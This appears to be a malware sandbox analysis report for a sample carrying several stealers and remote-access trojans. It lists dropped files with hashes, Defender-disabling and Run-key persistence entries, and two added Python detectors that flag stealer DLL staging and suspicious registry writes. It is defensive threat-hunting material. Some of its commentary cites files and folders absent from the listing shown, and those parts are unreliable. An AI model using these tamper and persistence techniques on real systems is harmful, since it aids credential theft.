SHA1 6170880409b24de75c2dc3d56a506fbff7f6622c
SHA256 f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56
SHA512 fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9

memory/2024-149-0x0000000000000000-mapping.dmp

memory/1344-150-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3a1ed9c3a15d01d06774e635b80f737b
SHA1 7860c6f384029586c3a2d8145bf140c6f09f965f
SHA256 895e6ca799bcb258432e9fb1334a4a2ca5f1d3d4c12b08dda129c87d367fed3f
SHA512 6bd71f1cd8878769689f262b2f59e9ce867228a90a56651afe974cd78c77dee55d8536c7d9a06b510f9877d8ba57a10a761c996556ec95b33ac5d30218b33a70

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 3eff1d28a83d7c01ebbd6fdbeeb51b9b
SHA1 4f34a875b74b9b002ab25fb2a95a18ce94fbb783
SHA256 668692f2c0638542a373e6622e97ab2e356a18d3b500a2bc82da133de1b7ac43
SHA512 1c64b1895f0d8aaec135e36f99ff95c63193230dd2a361513c6b1a9964630455ebe6c7504e8eb172f83784d6617b5bd5b06ea9d3f898ec2684b996c167710505

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 3bb37c22086514b2d7e4bd549e818687
SHA1 f68d17c86e433744bb6361f8aae591a08458e42f
SHA256 c2c0a13b83269da2bdcf59a48db6d5c27ccccd43940b4169f21a40287a415277
SHA512 eeeade50eac37d0a3f20a831dec15e101c13b19ed24c09937625aca2dcffa6a521bcfb1918423454d870e4f9ebff0645cbabbd23ef5bdf92c1421224d2a22462

memory/1384-154-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1764-156-0x0000000000400000-0x0000000000405000-memory.dmp

memory/1232-157-0x0000000000400000-0x0000000000470000-memory.dmp

memory/1720-158-0x0000000004E30000-0x0000000004EA7000-memory.dmp

memory/1764-159-0x0000000000400000-0x0000000000405000-memory.dmp

memory/1308-160-0x00000000010B0000-0x0000000001122000-memory.dmp

memory/980-161-0x0000000000000000-mapping.dmp

memory/1764-162-0x0000000000400000-0x0000000000405000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1308-166-0x0000000000A80000-0x0000000000AA0000-memory.dmp

memory/1764-169-0x0000000000400000-0x0000000000405000-memory.dmp

memory/1720-165-0x0000000000750000-0x0000000000776000-memory.dmp

C:\Users\Public\nest.bat

MD5 8ada51400b7915de2124baaf75e3414c
SHA1 1a7b9db12184ab7fd7fce1c383f9670a00adb081
SHA256 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7
SHA512 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68

memory/1088-178-0x0000000000417A8B-mapping.dmp

\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/1088-189-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1088-188-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1628-184-0x0000000000230000-0x0000000000231000-memory.dmp

memory/1816-183-0x000000000040616E-mapping.dmp

memory/1712-182-0x0000000002160000-0x000000000217F000-memory.dmp

memory/1816-180-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/1768-196-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/1816-193-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/636-174-0x0000000000000000-mapping.dmp

memory/1572-172-0x0000000000000000-mapping.dmp

memory/1712-170-0x0000000004A50000-0x0000000004AC2000-memory.dmp

memory/1764-164-0x00000000004019E4-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\tmpFF26.tmp

MD5 ac9ba09a7d6fa1b7b28bdfccb8891315
SHA1 911e075176c36daeee8ea457939b56385de09fc2
SHA256 e8eaba3b34b3aa0b45fc3258cbfdd20dff2432a2e5c130fc194ac37d619fc5a9
SHA512 67c0247df9fbb06a14bd794513fa9354bf9551eaa8b69926988e74452fed5c46b4c8dd2e6e21a4bcff651b70ee99f3c19605044509a4f98cde4ac75fd17e55b2

memory/744-203-0x0000000000000000-mapping.dmp

memory/1080-206-0x0000000000400000-0x0000000000412000-memory.dmp

\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Windows\temp\eiyxrtf0.inf

MD5 ff83a2f7aa0a0f76adc23a780e4a77ba
SHA1 654a2a6496c713b2458bcb754ec78f1fad61a60e
SHA256 45d6214a004a317c16170ce72c1a12bd8a875e621cbfd6a3d56e8d13198fd186
SHA512 1fec7dbe17d1e222e3ff7f43e4a9e6181f61e3a0c269e2e5b2dab598cb1e1dd21af1ee718c14b914263cc1ee1d61907577d392c148b01990bfb33f2fcbd3b551

C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/1080-208-0x000000000040C71E-mapping.dmp

memory/1080-210-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1816-212-0x00000000047D0000-0x00000000047D1000-memory.dmp

memory/1816-213-0x00000000047D5000-0x00000000047E6000-memory.dmp

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

\ProgramData\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\ProgramData\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

memory/1520-219-0x0000000000000000-mapping.dmp

memory/1696-220-0x0000000000000000-mapping.dmp

memory/1080-222-0x00000000042B0000-0x00000000042B1000-memory.dmp

memory/980-223-0x0000000000000000-mapping.dmp

memory/980-224-0x00000000001B0000-0x00000000001B1000-memory.dmp

memory/992-230-0x00000000004019E4-mapping.dmp

memory/1900-233-0x0000000000000000-mapping.dmp
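
The dropped-file listing above is long and repetitive, but it carries one signal worth pulling out automatically: the same set of Mozilla NSS libraries (nss3.dll, mozglue.dll, freebl3.dll, softokn3.dll) plus sqlite3.dll and the VC runtime appears twice, once under \Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x and once under \ProgramData. Firefox ships these DLLs under Program Files and nowhere else; a stealer drops its own copy so it can open key4.db and logins.json offline. The Python below is an added example written for this page (not the sandbox vendor's code): it parses the report's plain-text "path / MD5 / SHA1 / SHA256 / SHA512" blocks, collapses the repeated entries, and flags any directory outside Program Files or Windows that received three or more of the bundle. The listing it runs on is a constructed excerpt of the one above, trimmed to SHA256 lines.

```python
"""Parse the plain-text dropped-file listing above (a path line followed by
MD5/SHA1/SHA256/SHA512 lines, interleaved with memory/... dump references)
and flag directories that received the Firefox NSS/SQLite bundle.
Added example for this page; not the sandbox vendor's code."""
import posixpath
import re
from collections import defaultdict

PATH_RE = re.compile(r"^(?:[A-Za-z]:)?\\")  # '\Users\...' or 'C:\Users\...'
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEMDUMP_RE = re.compile(r"^memory/")

# DLLs a stealer drops so it can decrypt Firefox key4.db/logins.json offline.
# Firefox ships them under Program Files; a copy anywhere else is staging.
NSS_BUNDLE = {"nss3.dll", "mozglue.dll", "freebl3.dll", "softokn3.dll", "sqlite3.dll"}
LEGIT_PREFIXES = ("/program files", "/windows")


def normalise(path: str) -> str:
    """'C:\\Users\\x' and '\\Users\\x' are the same file: drop the drive letter,
    use forward slashes and lower-case (NTFS paths are case-insensitive)."""
    p = path.replace("\\", "/")
    if re.match(r"^[A-Za-z]:", p):
        p = p[2:]
    return p.lower()


def parse_dropped_files(report_text: str) -> dict:
    """Return {sha256: {"hashes": {...}, "paths": set, "count": n}}.
    Repeated entries for one file collapse into one record; "count" keeps
    how many times the listing mentioned it."""
    files, current, hashes = {}, None, {}

    def close():  # flush the block being read
        if current is not None and "sha256" in hashes:
            rec = files.setdefault(hashes["sha256"],
                                   {"hashes": {}, "paths": set(), "count": 0})
            rec["hashes"].update(hashes)
            rec["paths"].add(normalise(current))
            rec["count"] += 1

    for raw in report_text.splitlines():
        line = raw.strip()
        if not line or MEMDUMP_RE.match(line):
            continue
        m = HASH_RE.match(line)
        if m:
            hashes[m.group(1).lower()] = m.group(2).lower()
        elif PATH_RE.match(line):
            close()  # a new path line ends the previous block
            current, hashes = line, {}
    close()
    return files


def nss_staging_dirs(files: dict, min_hits: int = 3) -> dict:
    """Directories outside Program Files / Windows holding at least min_hits
    DLLs of the NSS bundle -> sorted names of the DLLs found there."""
    by_dir = defaultdict(set)
    for rec in files.values():
        for p in rec["paths"]:
            directory, name = posixpath.split(p)
            if name in NSS_BUNDLE and not directory.startswith(LEGIT_PREFIXES):
                by_dir[directory].add(name)
    return {d: sorted(n) for d, n in by_dir.items() if len(n) >= min_hits}


# Excerpt of the listing above, constructed for this example: entries are
# trimmed to their SHA256 line (the parser accepts any subset of the hashes).
SAMPLE_LISTING = r"""
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5 f964811b68f9f1487c2b41e1aef576ce
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
memory/1720-97-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
\ProgramData\sqlite3.dll
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
\ProgramData\nss3.dll
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
\ProgramData\mozglue.dll
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
"""

if __name__ == "__main__":
    files = parse_dropped_files(SAMPLE_LISTING)
    for directory, names in nss_staging_dirs(files).items():
        print(f"NSS bundle staged in {directory}: {', '.join(names)}")
```

Run over the full listing above, this reports two staging directories: \Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x (nss3, mozglue, softokn3, freebl3, with sqlite3.dll one level up in LocalLow) and \ProgramData (sqlite3, nss3, mozglue). The two copies of nss3.dll and mozglue.dll have different hashes, so they are two independently dropped bundles rather than one copied twice, which fits a sample the report tags as carrying both a Raccoon and an Oski payload. For hunting, the bundle names in a user-writable directory are a more durable indicator than the hashes, which change with every NSS build the operator packs.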

Analysis: behavioral2

Detonation Overview

Submitted

2021-08-13 07:57

Reported

2021-08-13 08:02

Platform

win10v20210410

Max time kernel

152s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

Signatures

AsyncRat

rat asyncrat

Azorult

trojan infostealer azorult

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Oski

infostealer oski

Raccoon

stealer raccoon

Raccoon Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A

Remcos

rat remcos

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M16

suricata

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Downloads MZ/PE file

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw = "C:\\Users\\Public\\Libraries\\wtyjodB.url" C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
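
The registry rows under "Windows security modification", "Adds Run key to start application" and "Checks processor information in registry" above are the kind of event a host-based detection keys on: a Defender TamperProtection value written as 0, a Run entry whose data is a .url shortcut in C:\Users\Public\Libraries, and a ProcessorNameString lookup from an executable in a user profile. The Python below is an added example written for this page (not the sandbox vendor's code). It parses rows in the report's own flattened form, `<op> <key path>[ = "<data>"] <process path> N/A`, and scores them; the two benign rows and the severity labels are constructed assumptions for the illustration.

```python
"""Turn the registry rows of the Signatures section above into detections.
Each row has the flattened form
    <op> <key path>[ = "<data>"] <process path> N/A
Added example for this page (not the sandbox vendor's code); the two benign
rows and the severity labels are constructed assumptions."""
import re

ROW_RE = re.compile(
    r'^(?P<op>Key created|Key value queried|Set value \(\w+\))\s+'
    r'(?P<key>\\REGISTRY\\.+?)'          # non-greedy: key paths may contain spaces
    r'(?:\s+=\s+"(?P<data>.*)")?'        # optional quoted value data
    r'\s+(?P<proc>[A-Za-z]:\\\S+)\s+N/A$'
)

USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
SCRIPT_EXT = (".url", ".lnk", ".hta", ".js", ".vbs", ".bat", ".cmd", ".ps1")

# Rows copied from the report above, followed by two constructed benign rows.
SAMPLE_ROWS = [
    r'Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\rqJB2Bm7T4.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" C:\Users\Admin\AppData\Local\Temp\Kr7vNWeR8w.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A',
    # constructed benign rows (not from the report)
    r'Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExampleUpdater = "C:\\Program Files\\Example\\updater.exe" C:\Windows\System32\msiexec.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\svchost.exe N/A',
]


def parse_row(row: str):
    """Split one report row into op / key / data / proc, or None if it is
    not a registry row (table headers, N/A rows)."""
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    ev = m.groupdict()
    # the report escapes backslashes inside quoted data ('C:\\Users\\...')
    ev["data"] = (ev["data"] or "").replace("\\\\", "\\")
    return ev


def classify(ev: dict):
    """(severity, reason) for a parsed row, or None if it looks benign."""
    op, key = ev["op"], ev["key"].lower()
    data, proc = ev["data"].lower(), ev["proc"].lower()
    # Match the key's tail, not its full path: the report shows the write landed
    # under WOW6432Node (the 32-bit redirected view), which a rule written for
    # the exact 64-bit key path would miss.
    if (op.startswith("Set value")
            and key.endswith("\\windows defender\\features\\tamperprotection")
            and data == "0"):
        return "high", "Defender TamperProtection set to 0"
    if op.startswith("Set value") and "\\currentversion\\run\\" in key:
        if data.endswith(SCRIPT_EXT) or data.startswith("c:\\users\\public\\"):
            return "high", "Run entry is a shortcut/script or lives in a world-writable folder"
        if not data.startswith(("c:\\program files", "c:\\windows\\")):
            return "medium", "Run entry outside Program Files / Windows"
    if (op == "Key value queried" and key.endswith("\\processornamestring")
            and proc.startswith(USER_WRITABLE)):
        return "low", "CPU name lookup from a user-writable path (common VM/sandbox check)"
    return None


def scan(rows):
    """Return [(severity, process, reason)] for every row that trips a rule."""
    hits = []
    for row in rows:
        ev = parse_row(row)
        if ev is None:
            continue
        verdict = classify(ev)
        if verdict:
            hits.append((verdict[0], ev["proc"], verdict[1]))
    return hits


if __name__ == "__main__":
    for severity, proc, reason in scan(SAMPLE_ROWS):
        print(f"[{severity}] {proc}: {reason}")
```

Two caveats when turning these rows into production rules. The TamperProtection write is recorded as an attempt: on a Windows 10 build with tamper protection enforced, Defender rejects user-mode changes to its settings through the registry, so the row proves intent, not that real-time protection was actually switched off. And the path under WOW6432Node tells you the writer was a 32-bit process running under SysWOW64; anchoring the rule on the tail of the key, as above, keeps it from being sidestepped by the redirected view. A .url Internet shortcut as a Run value, pointing into C:\Users\Public\Libraries, is uncommon for legitimate software and is worth alerting on regardless of what the shortcut resolves to.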

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wdRIxA75Iu.exe N/A
